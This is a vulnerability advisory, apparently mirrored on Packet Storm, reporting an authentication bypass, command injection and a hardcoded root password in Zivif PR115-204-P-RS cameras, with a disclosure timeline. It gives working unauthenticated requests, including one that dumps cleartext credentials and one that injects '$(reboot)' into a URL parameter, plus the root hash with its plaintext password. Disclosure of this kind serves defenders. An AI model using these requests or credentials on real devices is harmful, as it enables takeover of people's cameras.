what you don't know can hurt you

Zivif PR115-204-P-RS 2.3.4.2103 Bypass / Command Injection / Hardcoded Password

Zivif PR115-204-P-RS 2.3.4.2103 Bypass / Command Injection / Hardcoded Password
Posted Dec 13, 2017
Authored by Silas Cutler

Zivif PR115-204-P-RS cameras version 2.3.4.2103 suffer from authentication bypass, command injection, and hardcoded password vulnerabilities.

tags | exploit, vulnerability, bypass
advisories | CVE-2017-17105, CVE-2017-17106, CVE-2017-17107
MD5 | c34cc75d39516718e28358cc3f925ed6

Zivif PR115-204-P-RS 2.3.4.2103 Bypass / Command Injection / Hardcoded Password

Change Mirror Download
Attack vector: Remote
Authentication: None
Researcher: Silas Cutler `p1nk` <silas.cutler@blacklistthisdomain.com>
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103


Timeline:
1 September 2017: Initial alerting to Zivif
1 September 2017: Zivif contact established.
3 September 2017: Details provided.
7 September 2017: Confirmation of vulnerabilities from Zivif
5 December 2017: Public note on Social Media CVE-2017-17105,
CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.
10 December 2017: This email


-[Overview]-
Implementation of access controls is Zivif cameras is severely lacking.
As a result, CGI functions can be called directly, bypassing
authentication checks.

This was first identified with the following request (CVE-2017-17106)
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser
Cameras respond to this with:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0
Credentials are returned in cleartext to the requester.

In exploring, unauthenticated remote command injection is possible using
(CVE-2017-17105)
http://<Camera
IP>/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot)

Command results are not returned, however are executed by the system.

One last findings was the /etc/passwd file contains the following
hard-coded entry (CVE-2017-17107):
root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

The encrypted password is cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$
Because of the way the file system is structured, changing this password
requires more work then running passwd.

-[Note]-
The hi3510 is shared with a couple other cameras I'm exploring. The
motd saying /Welcome to SONIX/ has lead me to speculate parts of this
firmware may be shared with other cameras.



-Silas



Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    34 Files
  • 16
    Jun 16th
    9 Files
  • 17
    Jun 17th
    33 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close